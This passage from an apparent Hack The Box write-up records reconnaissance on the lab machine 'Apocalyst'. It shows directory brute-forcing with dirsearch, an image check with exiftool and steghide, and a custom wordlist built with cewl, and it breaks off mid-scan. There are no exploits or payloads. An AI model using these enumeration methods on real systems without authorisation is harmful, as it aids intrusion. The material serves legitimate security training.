[07:42:45] Starting: [07:42:47] 200 - 157B - /blog/ [07:42:47] 200 - 157B - /Blog/ [07:42:47] 200 - 157B - /book/ [07:42:47] 200 - 157B - /broken/ [07:42:47] 200 - 157B - /build/ [07:42:47] 200 - 157B - /can/ [07:42:50] 200 - 157B - /custom/ [07:42:52] 200 - 157B - /accounts/ [07:42:52] 200 - 157B - /and/ [07:42:53] 200 - 157B - /art/ [07:42:53] 200 - 157B - /disclosure/ [07:42:53] 200 - 157B - /down/ [07:42:53] 200 - 157B - /dragon/ [07:42:54] 200 - 157B - /end/ [07:42:54] 200 - 157B - /entry/ [07:42:54] 200 - 157B - /events/ [07:42:54] 200 - 157B - /evil/ [07:42:56] 200 - 157B - /for/ [07:42:56] 200 - 157B - /from/ [07:42:56] 200 - 157B - /get/ [07:42:57] 200 - 157B - /any/ [07:42:58] 200 - 157B - /header/ [07:42:58] 200 - 157B - /hidden/ [07:42:58] 200 - 157B - /icon/ [07:42:58] 403 - 292B - /icons/ [07:42:58] 200 - 157B - /idea/ [07:42:59] 301 - 0B - /index.php/ -> http://10.10.10.46/ [07:42:59] 200 - 157B - /info/ [07:42:59] 200 - 157B - /information/ [07:42:59] 200 - 157B - /instance/ [07:43:00] 200 - 157B - /language/ [07:43:00] 200 - 19KB - /license.txt [07:43:00] 200 - 157B - /Log/ [07:43:01] 200 - 157B - /main/ [07:43:01] 200 - 157B - /masthead/ [07:43:01] 200 - 157B - /meta/ [07:43:02] 200 - 157B - /name/ [07:43:02] 200 - 157B - /number/ [07:43:02] 200 - 157B - /org/ [07:43:02] 200 - 157B - /page/ [07:43:03] 200 - 157B - /personal/ [07:43:03] 200 - 157B - /pictures/ [07:43:03] 200 - 157B - /post/ [07:43:03] 200 - 157B - /power/ [07:43:04] 200 - 157B - /reference/ [07:43:04] 200 - 157B - /announcement/ [07:43:05] 200 - 157B - /RSS/ [07:43:05] 200 - 157B - /Search/ [07:43:05] 200 - 157B - /secondary/ [07:43:05] 403 - 300B - /server-status/ [07:43:06] 200 - 157B - /site/ [07:43:06] 200 - 157B - /start/ [07:43:06] 200 - 157B - /state/ [07:43:07] 200 - 157B - /term/ [07:43:07] 200 - 157B - /text/ [07:43:07] 200 - 157B - /thanks/ [07:43:07] 200 - 157B - /the/ [07:43:07] 200 - 157B - /this/ [07:43:07] 200 - 157B - /time/ [07:43:07] 200 - 0B - /wp-content/ [07:43:07] 302 - 0B - /wp-admin/ -> http://apocalyst.htb/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.46%2Fwp-admin%2F&reauth=1 [07:43:08] 200 - 40KB - /wp-includes/ [07:43:08] 405 - 42B - /xmlrpc.php/
Task Completed

We found a bunch of folders, all have the same image.

Apocalyst03.png

u505@kali:~/HTB/Machines/Apocalyst$ curl http://apocalyst.htb/accounts/
<!doctype html>
 <br>
 <html lang="en">
 <head>
   <meta charset="utf-8">
 <br>
   <title>End of the world</title>
 </head>
 <br>
 <body>
   <img src="image.jpg">
 </body>
 </html>
u505@kali:~/HTB/Machines/Apocalyst$ wget  http://apocalyst.htb/accounts/image.jpg
--2020-05-12 07:22:05--  http://apocalyst.htb/personal/image.jpg
Resolving apocalyst.htb (apocalyst.htb)... 10.10.10.46
Connecting to apocalyst.htb (apocalyst.htb)|10.10.10.46|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207552 (203K) [image/jpeg]
Saving to: ‘image.jpg’

image.jpg 100%[===================>] 202.69K 1.17MB/s in 0.2s
2020-05-12 07:22:05 (1.17 MB/s) - ‘image.jpg’ saved [207552/207552]
u505@kali:~/HTB/Machines/Apocalyst$ exiftool image.jpg
ExifTool Version Number         : 11.94
File Name                       : image.jpg
Directory                       : .
File Size                       : 203 kB
File Modification Date/Time     : 2017:07:27 06:08:34-04:00
File Access Date/Time           : 2020:05:12 07:22:05-04:00
File Inode Change Date/Time     : 2020:05:12 07:22:05-04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1
u505@kali:~/HTB/Machines/Apocalyst$ steghide extract -sf image.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!

We try an extended search.

u505@kali:~/HTB/Machines/Apocalyst$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://10.10.10.46

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-05-12_07-14-25.log
Target: http://10.10.10.46
[07:14:25] Starting: [07:14:25] 301 - 0B - /index.php -> http://10.10.10.46/ [07:14:26] 200 - 0B - /wp-content/ [07:14:26] 200 - 157B - /book/ [07:14:27] 200 - 157B - /art/ [07:14:27] 200 - 157B - /start/ [07:14:27] 200 - 157B - /icon/ [07:14:27] 200 - 157B - /pictures/ [07:14:28] 200 - 2KB - /wp-login.php [07:14:28] 200 - 157B - /personal/ [07:14:28] 200 - 157B - /Search/ [07:14:29] 200 - 157B - /information/ [07:14:30] 200 - 157B - /reference/ [07:14:30] 200 - 157B - /entry/ [07:14:30] 200 - 19KB - /license.txt [07:14:32] 200 - 157B - /main/ [07:14:32] 200 - 157B - /get/ [07:14:32] 200 - 157B - /events/ [07:14:33] 200 - 157B - /page/ [07:14:33] 200 - 157B - /blog/ [07:14:33] 200 - 157B - /post/ [07:14:33] 200 - 157B - /text/ [07:14:34] 200 - 40KB - /wp-includes/ [07:14:34] 200 - 157B - /state/ [07:14:34] 200 - 157B - /custom/ [07:14:34] 200 - 157B - /language/ [07:14:35] 200 - 157B - /down/ [07:14:36] 200 - 157B - /term/ [07:14:36] 200 - 157B - /RSS/ [07:14:36] 200 - 157B - /site/ [07:14:36] 200 - 157B - /info/ [07:14:36] 200 - 157B - /Blog/ [07:14:37] 403 - 292B - /icons/ [07:14:37] 200 - 157B - /org/ [07:14:37] 403 - 290B - /.php [07:14:38] 200 - 157B - /masthead/ [07:14:38] 200 - 157B - /header/ [07:14:39] 200 - 157B - /time/ [07:14:41] 200 - 157B - /accounts/ [07:14:43] 200 - 157B - /name/ [07:14:44] 200 - 157B - /meta/ [07:14:44] 200 - 157B - /thanks/ [07:14:45] 200 - 157B - /platform/ [07:14:46] 200 - 157B - /power/ [07:14:47] 200 - 157B - /vision/ [07:14:48] 200 - 157B - /fire/ [07:14:48] 200 - 157B - /last/ [07:14:49] 200 - 157B - /New/ [07:14:50] 200 - 157B - /branding/ [07:14:53] 200 - 157B - /knowledge/ [07:14:54] 200 - 157B - /idea/ [07:14:55] 200 - 157B - /dates/ [07:14:55] 200 - 157B - /build/ [07:14:57] 200 - 157B - /publishing/ [07:14:58] 200 - 157B - /one/ [07:14:58] 200 - 157B - /announcement/ [07:15:01] 200 - 157B - /final/ [07:15:01] 200 - 157B - /point/ [07:15:01] 200 - 157B - /its/ [07:15:02] 200 - 157B - /visiting/ [07:15:03] 200 - 157B - /make/ [07:15:04] 200 - 157B - /may/ [07:15:06] 200 - 157B - /Archives/ [07:15:08] 200 - 157B - /Categories/ [07:15:14] 200 - 157B - /disclosure/ [07:15:14] 200 - 157B - /for/ [07:15:14] 200 - 135B - /wp-trackback.php [07:15:15] 200 - 157B - /from/ [07:15:18] 200 - 157B - /used/ [07:15:21] 200 - 157B - /Comments/ [07:15:21] 200 - 157B - /Link/ [07:15:22] 200 - 157B - /use/ [07:15:25] 200 - 157B - /end/ [07:15:25] 200 - 157B - /times/ [07:15:26] 200 - 157B - /number/ [07:15:26] 200 - 157B - /colophon/ [07:15:28] 200 - 157B - /eagle/ [07:15:30] 200 - 157B - /you/ [07:15:33] 302 - 0B - /wp-admin/ -> http://apocalyst.htb/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.46%2Fwp-admin%2F&reauth=1 [07:15:41] 200 - 157B - /good/ [07:15:42] 200 - 157B - /can/ [07:15:43] 200 - 157B - /long/ [07:15:45] 200 - 157B - /dragon/ [07:15:46] 200 - 157B - /The/ [07:15:47] 200 - 157B - /dream/ [07:15:47] 200 - 157B - /secondary/ [07:15:50] 200 - 157B - /dead/ [07:15:50] 200 - 157B - /the/ [07:15:58] 200 - 157B - /ultimate/ [07:15:58] 200 - 157B - /heads/ [07:16:00] 200 - 157B - /July/ [07:16:00] 200 - 157B - /two/ [07:16:01] 200 - 157B - /age/ [07:16:02] 200 - 157B - /seven/ [07:16:07] 200 - 157B - /and/ [07:16:07] 200 - 157B - /bit/ [07:16:14] 200 - 157B - /things/ [07:16:14] 200 - 157B - /after/ [07:16:15] 200 - 157B - /hidden/ [07:16:15] 200 - 157B - /over/ [07:16:16] 200 - 157B - /evil/ [07:16:20] 200 - 157B - /before/ [07:16:23] 200 - 157B - /days/ [07:16:32] 200 - 157B - /any/ [07:16:33] 200 - 157B - /religious/ [07:16:34] 200 - 157B - /Today/ [07:16:36] 200 - 157B - /broken/ [07:16:40] 200 - 157B - /little/ [07:16:43] 200 - 157B - /seals/ [07:16:44] 405 - 42B - /xmlrpc.php [07:16:47] 200 - 157B - /years/ [07:16:48] 200 - 157B - /Syndication/ [07:16:54] 200 - 157B - /Feed/ [07:16:56] 200 - 157B - /needs/ [07:16:58] 200 - 157B - /WordPress/ [07:17:00] 200 - 157B - /Book/ [07:17:03] 200 - 157B - /March/ [07:17:04] 200 - 157B - /Log/ [07:17:08] 200 - 157B - /Job/ [07:17:09] 200 - 157B - /reception/ [07:17:13] 200 - 157B - /Simple/ [07:17:17] 200 - 157B - /starting/ [07:17:18] 200 - 157B - /Hebrew/ [07:17:25] 200 - 157B - /supernatural/ [07:17:26] 200 - 157B - /still/ [07:17:32] 200 - 157B - /Number/ [07:17:37] 200 - 157B - /Daniel/ [07:17:39] 200 - 157B - /him/ [07:17:46] 200 - 157B - /eight/ [07:17:47] 200 - 157B - /river/ [07:17:49] 200 - 157B - /half/ [07:18:01] 200 - 157B - /One/ [07:18:06] 200 - 157B - /period/ [07:18:09] 200 - 157B - /forth/ [07:18:36] 200 - 157B - /Recent/ [07:18:44] 200 - 157B - /lake/ [07:18:52] 200 - 157B - /this/ [07:18:59] 200 - 157B - /sense/ [07:19:00] 200 - 157B - /Roman/ [07:19:00] 200 - 157B - /here/ [07:19:01] 200 - 157B - /standing/ [07:19:05] 200 - 157B - /John/ [07:20:21] 200 - 157B - /has/ [07:20:46] 200 - 157B - /early/ [07:20:49] 200 - 157B - /Meta/ [07:20:50] 200 - 157B - /too/ [07:21:02] 302 - 0B - /wp-signup.php -> http://apocalyst.htb/wp-login.php?action=register [07:21:03] 200 - 157B - /God/ [07:21:13] 200 - 157B - /bowl/ [07:21:20] 200 - 157B - /frequent/ [07:21:21] 200 - 157B - /fires/ [07:21:25] 200 - 157B - /cultures/ [07:21:40] 200 - 157B - /enhancing/ [07:21:40] 200 - 157B - /Greek/ [07:21:42] 200 - 157B - /preparation/ [07:21:43] 200 - 157B - /prophecy/ [07:21:49] 200 - 157B - /length/ [07:21:58] 200 - 157B - /revelations/ [07:22:04] 200 - 157B - /End/ [07:22:06] 200 - 157B - /revelation/ [07:22:10] 200 - 157B - /Dreams/ [07:22:15] 200 - 157B - /got/ [07:23:14] 200 - 157B - /scenario/ [07:24:07] 200 - 157B - /covenant/ [07:24:11] 200 - 157B - /Seven/ [07:24:27] 200 - 157B - /Old/ [07:25:34] 200 - 157B - /Prince/ [07:26:01] 200 - 157B - /either/ [07:26:46] 403 - 300B - /server-status/ [07:27:27] 200 - 157B - /vii/ [07:27:36] 200 - 157B - /being/ [07:27:40] 200 - 157B - /must/ [07:28:17] 200 - 157B - /something/ [07:28:17] 200 - 157B - /going/ [07:28:57] 200 - 157B - /Beast/ [07:30:54] 200 - 157B - /Just/ [07:31:07] 200 - 157B - /commonly/ [07:33:40] 200 - 157B - /contexts/ [07:33:53] 200 - 157B - /Four/ [07:35:54] 200 - 157B - /horns/ [07:37:14] 200 - 157B - /describe/ [07:37:35] 200 - 157B - /trumpets/ [07:38:56] 200 - 157B - /unto/ [07:39:00] 200 - 157B - /sacrifice/ [07:39:24] 200 - 157B - /mentions/ [07:39:40] 200 - 157B - /fifty/
Task Completed

But we find again and again the same information in all the folders.

Word list generation

We use the tool cewl. Cewl is a spider that crawl a website and extract the list of words.

u505@kali:~/HTB/Machines/Apocalyst$ cewl -v http://apocalyst.htb -w apocalyst.list
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://apocalyst.htb
Visiting: http://apocalyst.htb, got response code 200
Attribute text found:
Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed RSD Link needs disambiguation. (March 2017) Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.

Visiting: http://apocalyst.htb/?p=9 referred from http://apocalyst.htb, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed Apocalypse Preparation Blog » How Long do we Have? Comments Feed RSD What is the Apocalypse? Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Offsite link, not following: http://www.express.co.uk/news/weird/769751/Apocalypse-End-of-the-world-jesus-christ Offsite link, not following: http://www.dailystar.co.uk/news/latest-news/589161/Bible-mystery-apocalypse-2017-end-of-world-this-year-Jesus-Christ Visiting: http://apocalyst.htb/?p=7 referred from http://apocalyst.htb, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed Apocalypse Preparation Blog » What is the Apocalypse? Comments Feed RSD Under Development How Long do we Have? Link needs disambiguation. (March 2017) Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Visiting: http://apocalyst.htb/?p=5 referred from http://apocalyst.htb, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed Apocalypse Preparation Blog » Under Development Comments Feed RSD What is the Apocalypse? Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Visiting: http://apocalyst.htb/?m=201707 referred from http://apocalyst.htb, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed RSD Link needs disambiguation. (March 2017) Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Visiting: http://apocalyst.htb/?cat=1 referred from http://apocalyst.htb, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed Apocalypse Preparation Blog » Uncategorised Category Feed RSD Link needs disambiguation. (March 2017) Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Visiting: http://apocalyst.htb/wp-login.php referred from http://apocalyst.htb, got response code 200 Attribute text found: Powered by WordPress
Visiting: http://apocalyst.htb/?feed=rss2 referred from http://apocalyst.htb, got response code 200 Attribute text found: Link needs disambiguation. (March 2017)
Visiting: http://apocalyst.htb/?feed=comments-rss2 referred from http://apocalyst.htb, got response code 200 Attribute text found:

Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Visiting: http://apocalyst.htb/?author=1 referred from http://apocalyst.htb/?p=9, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed Apocalypse Preparation Blog » Posts by falaraki Feed RSD Link needs disambiguation. (March 2017) Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Offsite link, not following: http://www.express.co.uk/news/weird/769751/Apocalypse-End-of-the-world-jesus-christ Offsite link, not following: http://www.express.co.uk/news/weird/769751/Apocalypse-End-of-the-world-jesus-christ Offsite link, not following: http://www.express.co.uk/news/weird/769751/Apocalypse-End-of-the-world-jesus-christ Offsite link, not following: http://www.dailystar.co.uk/news/latest-news/589161/Bible-mystery-apocalypse-2017-end-of-world-this-year-Jesus-Christ Offsite link, not following: http://www.dailystar.co.uk/news/latest-news/589161/Bible-mystery-apocalypse-2017-end-of-world-this-year-Jesus-Christ Offsite link, not following: http://www.dailystar.co.uk/news/latest-news/589161/Bible-mystery-apocalypse-2017-end-of-world-this-year-Jesus-Christ Visiting: http://apocalyst.htb:80/?p=9#respond referred from http://apocalyst.htb/?p=9, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed Apocalypse Preparation Blog » How Long do we Have? Comments Feed RSD What is the Apocalypse? Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Visiting: http://apocalyst.htb:80/?p=7#respond referred from http://apocalyst.htb/?p=7, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed Apocalypse Preparation Blog » What is the Apocalypse? Comments Feed RSD Under Development How Long do we Have? Link needs disambiguation. (March 2017) Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Visiting: http://apocalyst.htb:80/?p=5#respond referred from http://apocalyst.htb/?p=5, got response code 200 Attribute text found: Apocalypse Preparation Blog Apocalypse Preparation Blog » Feed Apocalypse Preparation Blog » Comments Feed Apocalypse Preparation Blog » Under Development Comments Feed RSD What is the Apocalypse? Really Simple Syndication Really Simple Syndication Powered by WordPress, state-of-the-art semantic personal publishing platform.
Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: http://www.express.co.uk/news/weird/769751/Apocalypse-End-of-the-world-jesus-christ Offsite link, not following: http://www.dailystar.co.uk/news/latest-news/589161/Bible-mystery-apocalypse-2017-end-of-world-this-year-Jesus-Christ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: http://www.express.co.uk/news/weird/769751/Apocalypse-End-of-the-world-jesus-christ Offsite link, not following: http://www.dailystar.co.uk/news/latest-news/589161/Bible-mystery-apocalypse-2017-end-of-world-this-year-Jesus-Christ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Offsite link, not following: https://wordpress.org/ Visiting: http://apocalyst.htb/wp-login.php?action=lostpassword referred from http://apocalyst.htb/wp-login.php, got response code 200 Attribute text found: Powered by WordPress
Offsite link, not following: http://www.express.co.uk/news/weird/769751/Apocalypse-End-of-the-world-jesus-christ Offsite link, not following: http://www.dailystar.co.uk/news/latest-news/589161/Bible-mystery-apocalypse-2017-end-of-world-this-year-Jesus-Christ Writing words to file

Cewl has extracted 531 different words.

u505@kali:~/HTB/Machines/Apocalyst$ wc -l apocalyst.list
531 apocalyst.list

We use this word list as dictionary for dirsearch.

u505@kali:~/HTB/Machines/Apocalyst$ python3 /opt/utils/dirsearch/dirsearch.py -w apocalyst.list -e "txt" -f -t 1000 -u http://10.10.10.46                       
 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 1062
Error Log: /opt/utils/dirsearch/logs/errors-20-05-12_07-49-43.log
Target: http://10.10.10.46
[07:49:44] Starting: [07:49:44] 200 - 157B - /literally/ [07:49:45] 200 - 157B - /Skip/ [07:49:45] 200 - 157B - /the/ [07:49:45] 200 - 157B - /uncovering/ [07:49:45] 200 - 175B - /Rightiousness/ [07:49:45] 200 - 157B - /Psalms/ [07:49:45] 200 - 157B - /icon/ [07:49:45] 200 - 157B - /post/ [07:49:45] 200 - 157B - /before/ [07:49:45] 200 - 157B - /platform/ [07:49:46] 200 - 157B - /number/ [07:49:46] 200 - 157B - /End/ [07:49:46] 200 - 157B - /Revelation/ [07:49:46] 200 - 157B - /main/ [07:49:46] 200 - 157B - /heavenly/ [07:49:46] 200 - 157B - /some/ [07:49:46] 200 - 157B - /revelation/ [07:49:46] 200 - 157B - /times/ [07:49:46] 200 - 157B - /may/ [07:49:46] 200 - 157B - /length/ [07:49:46] 200 - 157B - /Mosis/ [07:49:46] 200 - 157B - /knowledge/ [07:49:46] 200 - 157B - /Log/ [07:49:46] 200 - 157B - /for/ [07:49:46] 200 - 157B - /vision/ [07:49:46] 200 - 157B - /you/ [07:49:46] 200 - 157B - /following/ [07:49:46] 200 - 157B - /judgment/ [07:49:46] 200 - 157B - /last/ [07:49:46] 200 - 157B - /Book/ [07:49:46] 200 - 157B - /page/ [07:49:46] 200 - 157B - /Dreams/ [07:49:46] 200 - 157B - /colophon/ [07:49:46] 200 - 157B - /Archives/ [07:49:47] 200 - 157B - /made/ [07:49:47] 200 - 157B - /accounts/ [07:49:47] 200 - 157B - /WordPress/ [07:49:47] 200 - 157B - /final/ [07:49:47] 200 - 157B - /frequent/ [07:49:47] 200 - 157B - /disambiguation/ [07:49:47] 200 - 157B - /RSD/ [07:49:47] 200 - 157B - /Apokalypsis/ [07:49:47] 200 - 157B - /header/ [07:49:47] 200 - 157B - /seven/ [07:49:47] 200 - 157B - /broken/ [07:49:47] 200 - 157B - /Assumptio/ [07:49:47] 200 - 157B - /then/ [07:49:47] 200 - 157B - /meta/ [07:49:47] 200 - 157B - /custom/ [07:49:47] 200 - 157B - /from/ [07:49:47] 200 - 157B - /prophetic/ [07:49:47] 200 - 157B - /lake/ [07:49:47] 200 - 157B - /going/ [07:49:47] 200 - 157B - /supernatural/ [07:49:47] 200 - 157B - /Sheol/ [07:49:47] 200 - 157B - /religious/ [07:49:47] 200 - 157B - /publishing/ [07:49:47] 200 - 157B - /days/ [07:49:47] 200 - 157B - /org/ [07:49:47] 200 - 157B - /Meta/ [07:49:47] 200 - 157B - /art/ [07:49:47] 200 - 157B - /age/ [07:49:47] 200 - 157B - /have/ [07:49:47] 200 - 157B - /reference/ [07:49:47] 200 - 157B - /Greek/ [07:49:47] 200 - 157B - /scenario/ [07:49:47] 200 - 157B - /good/ [07:49:47] 200 - 157B - /him/ [07:49:47] 200 - 157B - /realities/ [07:49:47] 200 - 157B - /Romans/ [07:49:47] 200 - 157B - /Vasnetsov/ [07:49:48] 200 - 157B - /RSS/ [07:49:48] 200 - 157B - /The/ [07:49:48] 200 - 157B - /being/ [07:49:48] 200 - 157B - /evil/ [07:49:48] 200 - 157B - /starting/ [07:49:48] 200 - 157B - /events/ [07:49:48] 200 - 157B - /Posts/ [07:49:48] 200 - 157B - /taken/ [07:49:48] 200 - 157B - /something/ [07:49:48] 200 - 157B - /years/ [07:49:48] 200 - 157B - /state/ [07:49:48] 200 - 157B - /dates/ [07:49:48] 200 - 157B - /here/ [07:49:48] 200 - 157B - /July/ [07:49:48] 200 - 157B - /point/ [07:49:48] 200 - 157B - /vii/ [07:49:48] 200 - 157B - /commandment/ [07:49:48] 200 - 157B - /God/ [07:49:48] 200 - 157B - /book/ [07:49:48] 200 - 157B - /Apocalyptic/ [07:49:48] 200 - 157B - /apocalyptic/ [07:49:48] 200 - 157B - /seals/ [07:49:48] 200 - 157B - /unto/ [07:49:48] 200 - 157B - /contexts/ [07:49:48] 200 - 157B - /One/ [07:49:48] 200 - 157B - /power/ [07:49:48] 200 - 157B - /heads/ [07:49:48] 200 - 157B - /trumpets/ [07:49:48] 200 - 157B - /eight/ [07:49:48] 200 - 157B - /xciii/ [07:49:48] 200 - 157B - /semantic/ [07:49:48] 200 - 157B - /Esdras/ [07:49:48] 200 - 157B - /Horsemen/ [07:49:48] 200 - 157B - /Really/ [07:49:48] 200 - 157B - /language/ [07:49:48] 200 - 157B - /mentioned/ [07:49:48] 200 - 157B - /predicted/ [07:49:48] 200 - 157B - /Vega/ [07:49:48] 200 - 157B - /Baruch/ [07:49:48] 200 - 157B - /obscuring/ [07:49:48] 200 - 157B - /awaiting/ [07:49:48] 200 - 157B - /time/ [07:49:48] 200 - 157B - /horns/ [07:49:48] 200 - 157B - /over/ [07:49:48] 200 - 157B - /those/ [07:49:48] 200 - 157B - /can/ [07:49:48] 200 - 157B - /things/ [07:49:48] 200 - 157B - /covenant/ [07:49:48] 200 - 157B - /sense/ [07:49:48] 200 - 157B - /Symbolism/ [07:49:48] 200 - 157B - /standing/ [07:49:48] 200 - 157B - /enhancing/ [07:49:48] 200 - 157B - /Syndication/ [07:49:48] 200 - 157B - /disclosure/ [07:49:48] 200 - 157B - /called/ [07:49:48] 200 - 157B - /Garc%C3%ADa/ [07:49:48] 200 - 157B - /info/ [07:49:48] 200 - 157B - /needed/ [07:49:48] 200 - 157B - /cultures/ [07:49:48] 200 - 157B - /Blog/ [07:49:48] 200 - 157B - /announcement/ [07:49:48] 200 - 157B - /Beast/ [07:49:48] 200 - 157B - /apok%C3%A1lypsis/ [07:49:48] 200 - 157B - /blog/ [07:49:48] 200 - 157B - /Mauricio/ [07:49:48] 200 - 157B - /Symbolic/ [07:49:48] 200 - 157B - /manner/ [07:49:48] 200 - 157B - /glorification/ [07:49:48] 200 - 157B - /Hebrew/ [07:49:48] 200 - 157B - /term/ [07:49:48] 200 - 157B - /symbolic/ [07:49:48] 200 - 157B - /Posted/ [07:49:48] 200 - 157B - /Thus/ [07:49:48] 200 - 157B - /eagle/ [07:49:48] 200 - 157B - /dream/ [07:49:48] 200 - 157B - /Prince/ [07:49:49] 200 - 157B - /March/ [07:49:49] 200 - 157B - /forth/ [07:49:49] 200 - 157B - /mentions/ [07:49:49] 200 - 157B - /dead/ [07:49:49] 200 - 157B - /Search/ [07:49:49] 200 - 157B - /viii/ [07:49:49] 200 - 157B - /masthead/ [07:49:49] 200 - 157B - /use/ [07:49:49] 200 - 157B - /site/ [07:49:49] 200 - 157B - /Enoch/ [07:49:49] 200 - 157B - /described/ [07:49:49] 200 - 157B - /this/ [07:49:49] 200 - 157B - /been/ [07:49:49] 200 - 157B - /used/ [07:49:49] 200 - 157B - /also/ [07:49:49] 200 - 157B - /entry/ [07:49:49] 200 - 157B - /secondary/ [07:49:49] 200 - 157B - /and/ [07:49:49] 200 - 157B - /commonly/ [07:49:49] 200 - 157B - /Testament/ [07:49:49] 200 - 157B - /Number/ [07:49:49] 200 - 157B - /Daniel/ [07:49:49] 200 - 157B - /period/ [07:49:49] 200 - 157B - /reception/ [07:49:49] 200 - 157B - /river/ [07:49:49] 200 - 157B - /According/ [07:49:49] 200 - 157B - /any/ [07:49:49] 200 - 157B - /one/ [07:49:49] 200 - 157B - /Recent/ [07:49:49] 200 - 157B - /receives/ [07:49:49] 200 - 157B - /Dispensationalists/ [07:49:49] 200 - 157B - /Simple/ [07:49:49] 200 - 157B - /Categories/ [07:49:49] 200 - 157B - /personal/ [07:49:49] 200 - 157B - /text/ [07:49:49] 200 - 157B - /Taxo/ [07:49:49] 200 - 157B - /Comments/ [07:49:49] 200 - 157B - /are/ [07:49:49] 200 - 157B - /after/ [07:49:49] 200 - 157B - /Today/ [07:49:49] 200 - 157B - /hidden/ [07:49:49] 200 - 157B - /xxvi/ [07:49:49] 200 - 157B - /John/ [07:49:49] 200 - 157B - /Roman/ [07:49:49] 200 - 157B - /fires/ [07:49:49] 200 - 157B - /their/ [07:49:49] 200 - 157B - /shall/ [07:49:49] 200 - 157B - /get/ [07:49:49] 200 - 157B - /its/ [07:49:49] 200 - 157B - /Gehinnom/ [07:49:49] 200 - 157B - /Feed/ [07:49:49] 200 - 157B - /Seven/ [07:49:49] 200 - 157B - /fire/ [07:49:49] 200 - 157B - /vials/ [07:49:49] 200 - 157B - /consigned/ [07:49:49] 200 - 157B - /still/ [07:49:49] 200 - 157B - /employed/ [07:49:49] 200 - 157B - /fifty/ [07:49:49] 200 - 157B - /two/ [07:49:49] 200 - 157B - /occurs/ [07:49:49] 200 - 157B - /Link/ [07:49:49] 200 - 157B - /Viktor/ [07:49:49] 200 - 157B - /biblical/ [07:49:49] 200 - 157B - /gematria/ [07:49:50] 200 - 157B - /down/ [07:49:50] 200 - 157B - /Scroll/ [07:49:50] 200 - 157B - /New/ [07:49:50] 200 - 157B - /prophecy/ [07:49:52] 200 - 157B - /that/ [07:49:52] 200 - 157B - /has/ [07:49:52] 200 - 157B - /revelations/ [07:49:52] 200 - 157B - /Sibyllines/ [07:49:52] 200 - 157B - /Job/ [07:49:52] 200 - 157B - /Jerusalem/ [07:49:52] 200 - 157B - /ultimate/ [07:49:52] 200 - 157B - /sacrifice/ [07:49:52] 200 - 157B - /Uncategorised/ [07:49:52] 200 - 157B - /characteristic/ [07:49:52] 200 - 157B - /thus/ [07:49:52] 200 - 157B - /contemporary/ [07:49:52] 200 - 157B - /Four/ [07:49:52] 200 - 157B - /instance/ [07:49:52] 200 - 157B - /numerals/ [07:49:52] 200 - 157B - /judgments/ [07:49:52] 200 - 157B - /dragon/ [07:49:52] 200 - 